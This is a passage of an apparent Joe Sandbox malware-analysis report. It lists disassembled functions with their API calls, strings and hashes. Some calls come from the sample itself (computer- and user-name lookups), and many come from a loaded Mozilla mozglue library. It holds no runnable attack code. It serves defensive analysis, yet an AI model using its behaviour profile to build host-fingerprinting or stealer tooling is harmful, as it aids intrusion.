Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: c6e55279316169f4b09b4a08c1dd5d5624d65985029283c8342f472e92374d46
Instruction ID: f28172f979a7e8d5421c31003620af786abe75de555badaea81c9fe27dd62019
Opcode Fuzzy Hash: c6e55279316169f4b09b4a08c1dd5d5624d65985029283c8342f472e92374d46
Instruction Fuzzy Hash: 4BE01A71A4034C6BEB91EB90DC96FAE737C9B44B01F00429ABA0C5A1C0DE74AB858B91

Function 00471190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 004878E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00487910
Part of subcall function 004878E0: RtlAllocateHeap.NTDLL(00000000), ref: 00487917
Part of subcall function 004878E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0048792F

Part of subcall function 00487850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004711B7), ref: 00487880
Part of subcall function 00487850: RtlAllocateHeap.NTDLL(00000000), ref: 00487887
Part of subcall function 00487850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0048789F

ExitProcess.KERNEL32 ref: 004711C6

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateName$ComputerExitUser
String ID:
API String ID: 3550813701-0
Opcode ID: fab9f6f789476cea87074006073f7014a630dfbf51f1807756438354170e602c
Instruction ID: 285ff7bc2985056bd95474738ec64c5b1d3d6dc00fe7b8830795fb8d10fc7d02
Opcode Fuzzy Hash: fab9f6f789476cea87074006073f7014a630dfbf51f1807756438354170e602c
Instruction Fuzzy Hash: 5EE086F591420153CB0037F66C06B2E324C5704349F44192EF50882252FD1DE400876D

Non-executed Functions

Function 6C5F5440 Relevance: 138.8, APIs: 54, Strings: 25, Instructions: 587threadtimeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C5F5492
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C5F54A8
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C5F54BE
__Init_thread_footer.LIBCMT ref: 6C5F54DB

Part of subcall function 6C61AB3F: EnterCriticalSection.KERNEL32(6C66E370,?,?,6C5E3527,6C66F6CC,?,?,?,?,?,?,?,?,6C5E3284), ref: 6C61AB49
Part of subcall function 6C61AB3F: LeaveCriticalSection.KERNEL32(6C66E370,?,6C5E3527,6C66F6CC,?,?,?,?,?,?,?,?,6C5E3284,?,?,6C6056F6), ref: 6C61AB7C

Part of subcall function 6C61CBE8: GetCurrentProcess.KERNEL32(?,6C5E31A7), ref: 6C61CBF1
Part of subcall function 6C61CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C5E31A7), ref: 6C61CBFA

GetCurrentThreadId.KERNEL32 ref: 6C5F54F9
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_HELP), ref: 6C5F5516
GetCurrentThreadId.KERNEL32 ref: 6C5F556A
AcquireSRWLockExclusive.KERNEL32(6C66F4B8), ref: 6C5F5577
moz_xmalloc.MOZGLUE(00000070), ref: 6C5F5585
?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(00000000,00000001), ref: 6C5F5590
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP,?,00000001), ref: 6C5F55E6
ReleaseSRWLockExclusive.KERNEL32(6C66F4B8), ref: 6C5F5606
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C5F5616

Part of subcall function 6C61AB89: EnterCriticalSection.KERNEL32(6C66E370,?,?,?,6C5E34DE,6C66F6CC,?,?,?,?,?,?,?,6C5E3284), ref: 6C61AB94
Part of subcall function 6C61AB89: LeaveCriticalSection.KERNEL32(6C66E370,?,6C5E34DE,6C66F6CC,?,?,?,?,?,?,?,6C5E3284,?,?,6C6056F6), ref: 6C61ABD1

GetCurrentThreadId.KERNEL32 ref: 6C5F563E
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C5F5646
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6C5F567C
free.MOZGLUE(?), ref: 6C5F56AE

Part of subcall function 6C605E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C605EDB
Part of subcall function 6C605E90: memset.VCRUNTIME140(ewdl,000000E5,?), ref: 6C605F27
Part of subcall function 6C605E90: LeaveCriticalSection.KERNEL32(?), ref: 6C605FB2

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_NO_BASE), ref: 6C5F56E8
GetCurrentThreadId.KERNEL32 ref: 6C5F5707
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001), ref: 6C5F570F
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_ENTRIES), ref: 6C5F5729
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_DURATION), ref: 6C5F574E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_INTERVAL), ref: 6C5F576B
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES_BITFIELD), ref: 6C5F5796
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES), ref: 6C5F57B3
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FILTERS), ref: 6C5F57CA

Strings

MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C5F54A3
MOZ_PROFILER_STARTUP_FEATURES, xrefs: 6C5F57AE
- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s, xrefs: 6C5F5D1C
[I %d/%d] - MOZ_PROFILER_STARTUP is set, xrefs: 6C5F5717
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d, xrefs: 6C5F584E
- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB, xrefs: 6C5F5D2B
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C5F5791
- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s, xrefs: 6C5F5D01
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C5F548D
[I %d/%d] -> This process is excluded and won't be profiled, xrefs: 6C5F5BBE
MOZ_BASE_PROFILER_HELP, xrefs: 6C5F5511
[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s, xrefs: 6C5F5B38
- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s, xrefs: 6C5F5D24
MOZ_PROFILER_STARTUP, xrefs: 6C5F55E1
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C5F5724
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C5F54B9
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C5F5766
[I %d/%d] profiler_init, xrefs: 6C5F564E
- MOZ_PROFILER_STARTUP_DURATION not a valid float: %s, xrefs: 6C5F5CF9
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d, xrefs: 6C5F5AC9
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C5F57C5
MOZ_PROFILER_STARTUP_DURATION, xrefs: 6C5F5749
[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u, xrefs: 6C5F5C56
MOZ_PROFILER_STARTUP_NO_BASE, xrefs: 6C5F56E3
GeckoMain, xrefs: 6C5F5554, 6C5F55D5

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: getenv$CriticalSection$Current$Thread$EnterLeaveProcess$ExclusiveLock_getpidfree$AcquireCreation@Init_thread_footerReleaseStamp@mozilla@@TerminateTimeV12@exitmemsetmoz_xmalloc
String ID: - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s$- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s$- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB$- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s$- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s$GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$[I %d/%d] -> This process is excluded and won't be profiled$[I %d/%d] - MOZ_PROFILER_STARTUP is set$[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s$[I %d/%d] profiler_init
API String ID: 3686969729-1266492768
Opcode ID: 0715aa82ec26ce46a24a79798d6ad0598b17bd95fe9d418167c0ebee11a6d981
Instruction ID: ec2862defecfd7898c776acd4e9e0b67356486242747a86b7486712252513cb2
Opcode Fuzzy Hash: 0715aa82ec26ce46a24a79798d6ad0598b17bd95fe9d418167c0ebee11a6d981
Instruction Fuzzy Hash: 97221670A043009BDB04AF76C88836A77B1AF8734CF908929F96697F41E735944ACF5B

Function 6C5F6C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C5F6CCC
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C5F6D11
moz_xmalloc.MOZGLUE(0000000C), ref: 6C5F6D26

Part of subcall function 6C5FCA10: malloc.MOZGLUE(?), ref: 6C5FCA26

memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C5F6D35
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C5F6D53
CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C5F6D73
free.MOZGLUE(00000000), ref: 6C5F6D80
CertGetNameStringW.CRYPT32 ref: 6C5F6DC0
moz_xmalloc.MOZGLUE(00000000), ref: 6C5F6DDC
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C5F6DEB
CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C5F6DFF
CertFreeCertificateContext.CRYPT32(00000000), ref: 6C5F6E10
CryptMsgClose.CRYPT32(00000000), ref: 6C5F6E27
CertCloseStore.CRYPT32(00000000,00000000), ref: 6C5F6E34
CreateFileW.KERNEL32 ref: 6C5F6EF9
moz_xmalloc.MOZGLUE(00000000), ref: 6C5F6F7D
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C5F6F8C
memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C5F709D
CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C5F7103
free.MOZGLUE(00000000), ref: 6C5F7153
CloseHandle.KERNEL32(?), ref: 6C5F7176
__Init_thread_footer.LIBCMT ref: 6C5F7209
__Init_thread_footer.LIBCMT ref: 6C5F723A
__Init_thread_footer.LIBCMT ref: 6C5F726B
__Init_thread_footer.LIBCMT ref: 6C5F729C
__Init_thread_footer.LIBCMT ref: 6C5F72DC
__Init_thread_footer.LIBCMT ref: 6C5F730D
memset.VCRUNTIME140(?,00000000,00000110), ref: 6C5F73C2
VerSetConditionMask.NTDLL ref: 6C5F73F3
VerSetConditionMask.NTDLL ref: 6C5F73FF
VerSetConditionMask.NTDLL ref: 6C5F7406
VerSetConditionMask.NTDLL ref: 6C5F740D
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C5F741A
moz_xmalloc.MOZGLUE(?), ref: 6C5F755A
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C5F7568
CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C5F7585
_wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C5F7598
free.MOZGLUE(00000000), ref: 6C5F75AC

Part of subcall function 6C61AB89: EnterCriticalSection.KERNEL32(6C66E370,?,?,?,6C5E34DE,6C66F6CC,?,?,?,?,?,?,?,6C5E3284), ref: 6C61AB94
Part of subcall function 6C61AB89: LeaveCriticalSection.KERNEL32(6C66E370,?,6C5E34DE,6C66F6CC,?,?,?,?,?,?,?,6C5E3284,?,?,6C6056F6), ref: 6C61ABD1

Strings

SHA256, xrefs: 6C5F6EC0
(, xrefs: 6C5F768A
wintrust.dll, xrefs: 6C5F72CD
CryptCATAdminReleaseCatalogContext, xrefs: 6C5F72C8

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
API String ID: 3256780453-3980470659
Opcode ID: 48b26fb2d56b07819d258e8dec0eaa4a449838ad8108d20d81244699c4cd91a8
Instruction ID: 119ef895202f1e7285eebbfeecaffd3fc3c4481aae918527a4e247e854d813a5
Opcode Fuzzy Hash: 48b26fb2d56b07819d258e8dec0eaa4a449838ad8108d20d81244699c4cd91a8
Instruction Fuzzy Hash: 6E52E571A003149BEB25CF26CC84BAA77B8FF86704F104599E519A7740DB70AF85CF9A

Function 6C620DD0 Relevance: 83.9, APIs: 36, Strings: 10, Instructions: 3368COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C620F1F
LeaveCriticalSection.KERNEL32(?), ref: 6C620F99
memcpy.VCRUNTIME140(?,?,?), ref: 6C620FB7
EnterCriticalSection.KERNEL32(?), ref: 6C620FE9
memset.VCRUNTIME140(?,000000E5,00000000), ref: 6C621031
LeaveCriticalSection.KERNEL32(?), ref: 6C6210D0
EnterCriticalSection.KERNEL32(?), ref: 6C62117D
memset.VCRUNTIME140(?,000000E5,?), ref: 6C621C39
EnterCriticalSection.KERNEL32(6C66E744), ref: 6C623391
LeaveCriticalSection.KERNEL32(6C66E744), ref: 6C6233CD
LeaveCriticalSection.KERNEL32(?), ref: 6C623431
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C623437

Strings

MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C6237D2
MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6C623793
: (malloc) Unsupported character in malloc options: ', xrefs: 6C623A02
MOZ_CRASH(), xrefs: 6C623950
<jemalloc>, xrefs: 6C623941, 6C6239F1
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C6237BD
Compile-time page size does not divide the runtime one., xrefs: 6C623946
MOZ_RELEASE_ASSERT(mNode), xrefs: 6C623559, 6C62382D, 6C623848
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C6237A8
MALLOC_OPTIONS, xrefs: 6C6235FE

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memset$_errnomemcpy
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
API String ID: 3040639385-4173974723
Opcode ID: 068548cffea68949207c0eeeeb2576384d5a98040bce58b843a2195dc54b86a1
Instruction ID: 64a9dfe3dc119712262db99fc3188eca5f706d4f7eb6fda85894dd93e58969f2
Opcode Fuzzy Hash: 068548cffea68949207c0eeeeb2576384d5a98040bce58b843a2195dc54b86a1
Instruction Fuzzy Hash: 01538D71A197018FC304CF29C580615FBE1BF89328F29C66DE8699B791D77AE842CF85

Function 6C6434A0 Relevance: 61.0, APIs: 33, Strings: 1, Instructions: 1467COMMON

Download Yara Rule

APIs

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C643527
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C64355B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6435BC
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6435E0
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C64363A
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C643693
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6436CD
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C643703
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C64373C
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C643775
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C64378F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C643892
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6438BB
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C643902
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C643939
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C643970
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6439EF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C643A26
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C643AE5
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C643E85
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C643EBA
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C643EE2

Part of subcall function 6C646180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C6461DD
Part of subcall function 6C646180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C64622C

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6440F9
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C64412F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C644157

Part of subcall function 6C646180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C646250
Part of subcall function 6C646180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C646292

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C64441B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C644448
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C64484E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C644863
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C644878
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C644896
free.MOZGLUE ref: 6C64489F

Strings

, xrefs: 6C644CD2

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: floor$free$malloc$memcpy
String ID:
API String ID: 3842999660-3916222277
Opcode ID: 2587d446f43ab18c6fffb8592d8fbaa6a385b8ad45dda316d704489ec7b2e3ed
Instruction ID: a4f2b7892f33e3b65137d033c917b2a023366ab5edd96788b9380409a8de28ca
Opcode Fuzzy Hash: 2587d446f43ab18c6fffb8592d8fbaa6a385b8ad45dda316d704489ec7b2e3ed
Instruction Fuzzy Hash: FDF25B74908B808FC725CF29C0846AAFBF1FF8A304F51CA5ED98997711DB719896CB46

Function 6C5F64C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C5F64DF
GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C5F64F2
GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C5F6505
GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C5F6518
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C5F652B
memcpy.VCRUNTIME140(?,?,?), ref: 6C5F671C
GetCurrentProcess.KERNEL32 ref: 6C5F6724
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C5F672F
GetCurrentProcess.KERNEL32 ref: 6C5F6759
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C5F6764
VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C5F6A80
GetSystemInfo.KERNEL32(?), ref: 6C5F6ABE
__Init_thread_footer.LIBCMT ref: 6C5F6AD3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C5F6AE8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C5F6AF7

Strings

nvdxgiwrap.dll, xrefs: 6C5F6513
user32.dll, xrefs: 6C5F6526
_etoured.dll, xrefs: 6C5F64ED
nvd3d9wrap.dll, xrefs: 6C5F6500
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 6C5F6798
detoured.dll, xrefs: 6C5F64DA

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

